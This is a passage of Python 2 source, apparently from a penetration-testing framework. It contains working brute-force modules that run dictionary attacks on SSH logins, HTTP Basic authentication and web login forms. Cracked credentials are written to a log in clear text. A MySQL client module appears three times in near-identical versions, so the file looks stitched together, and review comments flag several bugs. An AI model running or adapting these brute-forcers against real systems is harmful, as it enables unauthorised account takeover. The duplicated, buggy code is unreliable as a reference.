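                                try:
                                    # NOTE(review): defaultport is not passed
                                    # to login(), and the session is left open
                                    # after a successful login.
                                    connect = pxssh.pxssh()
                                    connect.login(defaulthost, defaultuser, ps)
                                    ping.save("BruteForceSSH", defaulthost, defaultport, defaultuser, ps)
                                    print "\n-" + Suf + " Successfully with (" + defaultuser + "=" + ps + ")\n"
                                    return 1
                                except:
                                    # Bare except: every failure, network
                                    # errors included, is shown as a failed try.
                                    print " " + Alr + " Checking (" + defaultuser + "=" + ps + ")"
                    except:
                        d.filenot(defaultdicc)
                        # Fixed: this used to call btpop3(0), the prompt of a
                        # different module; return to this module's prompt.
                        btssh(0)
                except:
                    d.kbi()
            except:
                d.off()
        else:
            d.nocommand()
    except:
        d.kbi()
        exit()
    btssh(0)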
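def httpbt(run):
    """Command loop for the ``web/httpbt`` module.

    ``run`` equal to 1 starts the "run" action; otherwise one command is read
    from the operator. The function calls itself again after each command,
    except "back", which returns.

    "run" opens one TCP socket to the target and, for every user/password
    pair from ``defaultdic1`` and ``defaultdic2``, sends a GET for
    ``defaultpach`` with a Basic ``Authorization`` header. A reply without
    "401" is logged to ``core/logs/logsBruteForce.log``.
    """
    global defaulthost, defaultport, defaultpach, defaultdic1, defaultdic2
    try:
        if run != 1:
            actions = raw_input(d.prompt("web/httpbt"))
        else:
            actions = "run"
        if actions == "show options" or actions == "sop":
            d.option()
            d.descrip("target", "yes", "IP or DNS", defaulthost)
            d.descrip("port", "no", "Port of target", defaultport)
            d.descrip("patch", "yes", "Folder or dir", defaultpach)
            d.descrip("dict_1", "yes", "Dictionary user", defaultdic1)
            d.descrip("dict_2", "yes", "Dictionary pass", defaultdic2)
            print ""
        elif actions[0:10] == "set target":
            defaulthost = actions[11:]
            defaulthost = defaulthost.replace("http://", "")
            d.change("target", defaulthost)
            httpbt(0)
        elif actions[0:8] == "set port":
            defaultport = actions[9:]
            d.change("port", defaultport)
            httpbt(0)
        elif actions[0:9] == "set patch":
            defaultpach = actions[10:]
            d.change("patch", defaultpach)
            httpbt(0)
        elif actions[0:10] == "set dict_1":
            defaultdic1 = actions[11:]
            d.change("dict_1", defaultdic1)
            httpbt(0)
        elif actions[0:10] == "set dict_2":
            defaultdic2 = actions[11:]
            # Fixed: the change was announced under the "dict_1" label.
            d.change("dict_2", defaultdic2)
            httpbt(0)
        elif actions == "exit" or actions == "x":
            d.goodbye()
            exit()
        elif actions == "help" or actions == "h":
            help.help()
        elif actions == "back" or actions == "b":
            return
        elif actions == "run" or actions == "r":
            d.run()
            try:
                # ping.live's result is ignored; presumably it raises when the
                # target is unreachable -- TODO confirm.
                ping.live(defaulthost, defaultport)
                red = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                red.connect((defaulthost, int(defaultport)))
                try:
                    d.loading()
                    try:
                        with open(defaultdic1, 'r') as user:
                            for us in user:
                                try:
                                    with open(defaultdic2, 'r') as passs:
                                        for ps in passs:
                                            us = us.replace("\n", "")
                                            ps = ps.replace("\n", "")
                                            red.send("GET " + defaultpach + " HTTP/1.1\r\n")
                                            red.send("HOST: " + defaulthost + "\r\n")
                                            red.send("Authorization:Basic " + base64.b64encode(us + ":" + ps) + "\r\n\r\n")
                                            last = red.recv(1000)
                                            # NOTE(review): only the first 1000
                                            # bytes are searched, and find()
                                            # returning 0 is also treated as
                                            # "no 401 in the reply".
                                            if last.find("401") <= 0:
                                                # The log receives the pair in
                                                # clear text. The two expressions
                                                # built from us/ps below were
                                                # masked in the listing and are
                                                # restored from the d.sucess(us,
                                                # ps) call -- confirm against the
                                                # original file.
                                                with open('core/logs/logsBruteForce.log', 'a') as log:
                                                    log.write('\n ===================================== ')
                                                    log.write('\n Module : BruteForceHTTP')
                                                    log.write('\n Data : ' + time.strftime('%c'))
                                                    log.write('\n target : ' + defaulthost)
                                                    log.write('\n port : ' + defaultport)
                                                    log.write('\n patch : ' + defaultpach)
                                                    log.write('\n Cracked : username : ' + us + ' , password : ' + ps)
                                                d.sucess(us, ps)
                                                httpbt(0)
                                            else:
                                                print " [" + colors[4] + "!" + colors[0] + "] Checking (username=" + us + ")(password=" + ps + ")"
                                            # The original named `red.close`
                                            # here without calling it, so the
                                            # socket stayed open; later attempts
                                            # reuse it, and nothing closes it.
                                except:
                                    d.filenot(defaultdic2)
                                    httpbt(0)
                    except:
                        d.filenot(defaultdic1)
                        httpbt(0)
                except:
                    d.kbi()
            except:
                d.off()
        else:
            d.nocommand()
    except:
        d.kbi()
        exit()
    httpbt(0)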
def cmysql(run):
    """Command loop for the ``clt/sql`` module (interactive MySQL client).

    ``run`` equal to 1 starts the "run" action; otherwise one command is read
    from the operator. The function calls itself again after each command,
    except "back", which returns.

    "run" connects with ``defaultuser``/``defaultpass``, prints a help table
    and then executes every line typed at the ``sql`` prompt until "exit".
    """
    global defaulthost, defaultport, defaultuser, defaultpass
    try:
        choice = "run" if run == 1 else raw_input(d.prompt("clt/sql"))
        if choice in ("show options", "sop"):
            d.option()
            d.descrip("target", "yes", "IP or DNS", defaulthost)
            d.descrip("port", "no", "Port of target", defaultport)
            d.descrip("user", "yes", "Username", defaultuser)
            d.descrip("pass", "yes", "Password", defaultpass)
            d.space()
            cmysql(0)
        elif choice.startswith("set target"):
            defaulthost = defaulthost.replace("http://", "")
            defaulthost = ping.update(defaulthost, choice, "target")
            d.change("target", defaulthost)
        elif choice.startswith("set port"):
            defaultport = ping.update(defaultport, choice, "port")
            d.change("port", defaultport)
        elif choice.startswith("set user"):
            defaultuser = ping.update(defaultuser, choice, "user")
            d.change("user", defaultuser)
        elif choice.startswith("set pass"):
            defaultpass = ping.update(defaultpass, choice, "pass")
            d.change("pass", defaultpass)
        elif choice in ("exit", "x"):
            d.goodbye()
            exit()
        elif choice in ("help", "h"):
            help.help()
        elif choice in ("back", "b"):
            return
        elif choice in ("run", "r"):
            d.run()
            try:
                # ping.live's result is ignored; presumably it raises when the
                # service is unreachable -- TODO confirm.
                ping.live(defaulthost, defaultport)
                try:
                    # NOTE(review): defaultport is not passed to connect().
                    con = MySQLdb.connect(defaulthost, defaultuser, defaultpass, "")
                    try:
                        cmd = "nop"
                        rule = " -------------------------------------------------------------------------------------------------------"
                        print "\n " + Hlp + " SQL Client help\n"
                        print rule
                        print " |" + colors[6] + "Commd" + colors[0] + " | " + colors[6] + "Description" + colors[0] + " | " + colors[6] + "Examples" + colors[0] + " |"
                        print rule
                        for row in (
                            " |show databases | list databases | show databases |",
                            " |use | select database | use user_table |",
                            " |show tables | list tables | show tables |",
                            " |create database | create databases| create database USERS | ",
                            " |create table | create tables | create table EMAILS (id INT PRIMARY KEY, name VARCHAR(20)) | ",
                            " |drop database | drop databases | drop database USERS | ",
                            " |drop table | drop tables | drop table EMAIL | ",
                            " |insert | insert data | insert into EMAILS values ( '2', '*****@*****.**' ) | ",
                            " |update | update data | update EMAILS set name='Willy' where id=1 | ",
                            " |select | select data | select id, name from EMAILS | ",
                        ):
                            print row
                        print rule
                        print ""
                        while cmd != "exit":
                            cmd = raw_input(d.Client_prompt("sql"))
                            cur = con.cursor()
                            try:
                                # The typed line goes to the server verbatim;
                                # "exit" is sent too before the loop ends.
                                rows = cur.execute(cmd)
                                for _ in range(rows):
                                    print cur.fetchone()
                            except:
                                print " " + Bad + " No command '" + cmd + "' found"
                    except:
                        Errors.Errors(event=sys.exc_info()[0], info=False)
                except:
                    Errors.Errors(event=sys.exc_info(), info=defaulthost + ":" + defaultport)
            except:
                Errors.Errors(event=sys.exc_info()[0], info=defaulthost + ":" + defaultport)
        else:
            d.No_actions()
    except:
        Errors.Errors(event=sys.exc_info()[0], info=False)
    cmysql(0)
def cmysql(run):
    """Command loop for the ``clt/sql`` module (interactive MySQL client).

    A ``run`` value of 1 goes straight to the "run" action; any other value
    prompts the operator for a command. Every command except "back" ends with
    the function calling itself again.

    "run" connects with ``defaultuser``/``defaultpass``, prints a help table
    and executes each line typed at the prompt until "exit" is entered.
    """
    global defaulthost,defaultport,defaultuser,defaultpass
    try:
        if run == 1:
            entered = "run"
        else:
            entered = raw_input(d.prompt("clt/sql"))
        if entered in ("show options", "sop"):
            d.option()
            d.descrip("target","yes","IP or DNS",defaulthost)
            d.descrip("port","no","Port of target",defaultport)
            d.descrip("user","yes","Username",defaultuser)
            d.descrip("pass","yes","Password",defaultpass)
            print ""
            cmysql(0)
        elif entered.startswith("set target"):
            defaulthost = entered[11:].replace("http://", "")
            d.change("target",defaulthost)
            cmysql(0)
        elif entered.startswith("set port"):
            defaultport = entered[9:]
            d.change("port",defaultport)
            cmysql(0)
        elif entered.startswith("set user"):
            defaultuser = entered[9:]
            d.change("user",defaultuser)
            cmysql(0)
        elif entered.startswith("set pass"):
            defaultpass = entered[9:]
            d.change("pass",defaultpass)
            cmysql(0)
        elif entered in ("exit", "x"):
            d.goodbye()
            exit()
        elif entered in ("help", "h"):
            help.help()
        elif entered in ("back", "b"):
            return
        elif entered in ("run", "r"):
            d.run()
            try:
                # The value returned by ping.live is unused; presumably the
                # call raises on failure -- TODO confirm.
                ping.live(defaulthost,defaultport)
                try:
                    # NOTE(review): defaultport is not passed to connect().
                    con=MySQLdb.connect(defaulthost, defaultuser, defaultpass,"")
                    try:
                        cmd="nop"
                        rule=" -------------------------------------------------------------------------------------------------------"
                        print "\n "+Hlp+" SQL Client help\n"
                        print rule
                        print " |"+colors[6]+"Commd"+colors[0]+" | "+colors[6]+"Description"+colors[0]+" | "+colors[6]+"Examples"+colors[0]+" |"
                        print rule
                        for row in (
                            " |show databases | list databases | show databases |",
                            " |use | select database | use user_table |",
                            " |show tables | list tables | show tables |",
                            " |create database | create databases| create database USERS | ",
                            " |create table | create tables | create table EMAILS (id INT PRIMARY KEY, name VARCHAR(20)) | ",
                            " |drop database | drop databases | drop database USERS | ",
                            " |drop table | drop tables | drop table EMAIL | ",
                            " |insert | insert data | insert into EMAILS values ( '2', '*****@*****.**' ) | ",
                            " |update | update data | update EMAILS set name='Willy' where id=1 | ",
                            " |select | select data | select id, name from EMAILS | ",
                        ):
                            print row
                        print rule
                        print ""
                        while cmd!="exit":
                            cmd = raw_input(colors[1]+" CLT~"+colors[3]+"sql/> "+colors[0])
                            cur=con.cursor()
                            try:
                                # The typed line is executed verbatim.
                                count=cur.execute(cmd)
                                for _ in range(count):
                                    print cur.fetchone()
                            except:
                                print " ["+colors[1]+"-"+colors[0]+"] Error: command"
                    except KeyboardInterrupt:
                        d.kbi()
                    except Exception,err:
                        # Python 2: the parenthesised pair is printed as a tuple.
                        print(" ["+colors[1]+"-"+colors[0]+"] Timeout.", err)
                except:
                    d.nomatch()
            except:
                d.off()
        else:
            d.nocommand()
    except:
        d.kbi()
        exit()
    cmysql(0)
def cmysql(run):
    """Command loop for the ``clt/sql`` module (interactive MySQL client).

    With ``run`` set to 1 the "run" action starts at once; otherwise a
    command is read from the operator. After handling it the function calls
    itself again, except for "back", which returns.

    "run" opens a connection with ``defaultuser``/``defaultpass``, prints a
    help table and executes every line typed at the prompt until "exit".
    """
    global defaulthost, defaultport, defaultuser, defaultpass
    try:
        line = "run" if run == 1 else raw_input(d.prompt("clt/sql"))
        if line in ("show options", "sop"):
            d.option()
            d.descrip("target", "yes", "IP or DNS", defaulthost)
            d.descrip("port", "no", "Port of target", defaultport)
            d.descrip("user", "yes", "Username", defaultuser)
            d.descrip("pass", "yes", "Password", defaultpass)
            print ""
            cmysql(0)
        elif line.startswith("set target"):
            defaulthost = line[11:].replace("http://", "")
            d.change("target", defaulthost)
            cmysql(0)
        elif line.startswith("set port"):
            defaultport = line[9:]
            d.change("port", defaultport)
            cmysql(0)
        elif line.startswith("set user"):
            defaultuser = line[9:]
            d.change("user", defaultuser)
            cmysql(0)
        elif line.startswith("set pass"):
            defaultpass = line[9:]
            d.change("pass", defaultpass)
            cmysql(0)
        elif line in ("exit", "x"):
            d.goodbye()
            exit()
        elif line in ("help", "h"):
            help.help()
        elif line in ("back", "b"):
            return
        elif line in ("run", "r"):
            d.run()
            try:
                # ping.live's return value is unused; presumably it raises on
                # an unreachable service -- TODO confirm.
                ping.live(defaulthost, defaultport)
                try:
                    # NOTE(review): defaultport is not passed to connect().
                    con = MySQLdb.connect(defaulthost, defaultuser, defaultpass, "")
                    try:
                        cmd = "nop"
                        separator = " -------------------------------------------------------------------------------------------------------"
                        print "\n " + Hlp + " SQL Client help\n"
                        print separator
                        print " |" + colors[6] + "Commd" + colors[0] + " | " + colors[6] + "Description" + colors[0] + " | " + colors[6] + "Examples" + colors[0] + " |"
                        print separator
                        examples = (
                            " |show databases | list databases | show databases |",
                            " |use | select database | use user_table |",
                            " |show tables | list tables | show tables |",
                            " |create database | create databases| create database USERS | ",
                            " |create table | create tables | create table EMAILS (id INT PRIMARY KEY, name VARCHAR(20)) | ",
                            " |drop database | drop databases | drop database USERS | ",
                            " |drop table | drop tables | drop table EMAIL | ",
                            " |insert | insert data | insert into EMAILS values ( '2', '*****@*****.**' ) | ",
                            " |update | update data | update EMAILS set name='Willy' where id=1 | ",
                            " |select | select data | select id, name from EMAILS | ",
                        )
                        for example in examples:
                            print example
                        print separator
                        print ""
                        while cmd != "exit":
                            cmd = raw_input(colors[1] + " CLT~" + colors[3] + "sql/> " + colors[0])
                            cur = con.cursor()
                            try:
                                # The typed line is executed verbatim.
                                fetched = cur.execute(cmd)
                                for _ in range(fetched):
                                    print cur.fetchone()
                            except:
                                print " [" + colors[1] + "-" + colors[0] + "] Error: command"
                    except KeyboardInterrupt:
                        d.kbi()
                    except Exception, err:
                        # Python 2: the parenthesised pair is printed as a tuple.
                        print(" [" + colors[1] + "-" + colors[0] + "] Timeout.", err)
                except:
                    d.nomatch()
            except:
                d.off()
        else:
            d.nocommand()
    except:
        d.kbi()
        exit()
    cmysql(0)
def httpformbasebruteforce(run):
    """Command loop for the ``web/formbt`` module.

    A ``run`` value of 1 goes straight to the "run" action; any other value
    prompts the operator for a command. Every command except "back" ends with
    the function calling itself again.

    "run" sends one request to ``defaultpach`` per line of ``defaultdic2``,
    with ``defaultuser`` in the field ``defaultdat1`` and the line in
    ``defaultdat2``, and looks for the ``defaultcont`` marker in the reply.
    """
    global defaulthost, defaultport, defaultpach, defaultuser, defaultdic2, defaultdat1, defaultdat2, defaultmeth, defaultcont
    try:
        if run == 1:
            entered = "run"
        else:
            entered = raw_input(d.prompt("web/formbt"))
        if entered in ("show options", "sop"):
            d.option()
            d.descrip("target", "yes", "IP or DNS", defaulthost)
            d.descrip("port", "no", "Port of target", defaultport)
            d.descrip("patch", "yes", "Folder or dir", defaultpach)
            d.descrip("para_1", "yes", "Parameter 1", defaultdat1)
            d.descrip("user", "yes", "Username", defaultuser)
            d.descrip("para_2", "yes", "Parameter 2", defaultdat2)
            d.descrip("dict_1", "yes", "Dictionary pass", defaultdic2)
            d.descrip("method", "yes", "POST or GET", defaultmeth)
            d.descrip("condit", "yes", "[if!=]No Logged", defaultcont)
            print ""
        elif entered.startswith("set target"):
            defaulthost = defaulthost.replace("http://", "")
            defaulthost = ping.update(defaulthost, entered, "target")
            d.change("target", defaulthost)
        elif entered.startswith("set port"):
            defaultport = ping.update(defaultport, entered, "port")
            d.change("port", defaultport)
        elif entered.startswith("set patch"):
            defaultpach = ping.update(defaultpach, entered, "patch")
            d.change("patch", defaultpach)
        elif entered.startswith("set condit"):
            defaultcont = ping.update(defaultcont, entered, "condit")
            d.change("condit", defaultcont)
        elif entered.startswith("set user"):
            defaultuser = ping.update(defaultuser, entered, "user")
            d.change("user", defaultuser)
        elif entered.startswith("set dict_1"):
            defaultdic2 = ping.update(defaultdic2, entered, "dict_1")
            d.change("dict_1", defaultdic2)
        elif entered.startswith("set para_1"):
            defaultdat1 = ping.update(defaultdat1, entered, "para_1")
            d.change("para_1", defaultdat1)
        elif entered.startswith("set para_2"):
            defaultdat2 = ping.update(defaultdat2, entered, "para_2")
            d.change("para_2", defaultdat2)
        elif entered.startswith("set method"):
            defaultmeth = ping.update(defaultmeth, entered, "method")
            d.change("method", defaultmeth)
        elif entered in ("exit", "x"):
            d.goodbye()
            exit()
        elif entered in ("help", "h"):
            help.help()
        elif entered in ("back", "b"):
            return
        elif entered in ("run", "r"):
            d.run()
            try:
                # The value returned by ping.live is unused; presumably the
                # call raises on failure -- TODO confirm.
                ping.live(defaulthost, defaultport)
                try:
                    d.loading_file()
                    try:
                        with open(defaultdic2, 'r') as candidates:
                            for raw in candidates:
                                secret = raw.replace("\n", "")
                                form = urllib.urlencode({defaultdat1: defaultuser, defaultdat2: secret})
                                request_headers = {
                                    "Content-type": "application/x-www-form-urlencoded",
                                    "Accept": "text/plain"
                                }
                                link = httplib.HTTPConnection(defaulthost, defaultport)
                                link.request(defaultmeth, defaultpach, form, request_headers)
                                reply = link.getresponse()
                                content = reply.read()
                                # NOTE(review): a marker found at offset 0
                                # makes find() return 0, which this test also
                                # counts as "marker absent".
                                if content.find(defaultcont) <= 0:
                                    ping.savefour("BruteForceFormBase", defaulthost, defaultport, defaultpach, defaultmeth, defaultdat1, defaultdat2, defaultuser, secret)
                                    print "\n-" + Suf + " Successfully with [" + defaultdat1 + "=" + defaultuser + "][" + defaultdat2 + "=" + secret + "]\n"
                                    # Re-enters the prompt; the loop goes on
                                    # when that call returns.
                                    httpformbasebruteforce(0)
                                else:
                                    print " " + Alr + " Checking (" + defaultdat1 + "=" + defaultuser + ")(" + defaultdat2 + "=" + secret + ")"
                    except:
                        Errors.Errors(event=sys.exc_info()[0], info=defaultdic2)
                except:
                    Errors.Errors(event=sys.exc_info()[0], info=False)
            except:
                Errors.Errors(event=sys.exc_info()[0], info=defaulthost + ":" + defaultport)
        else:
            d.No_actions()
    except:
        Errors.Errors(event=sys.exc_info()[0], info=False)
    httpformbasebruteforce(0)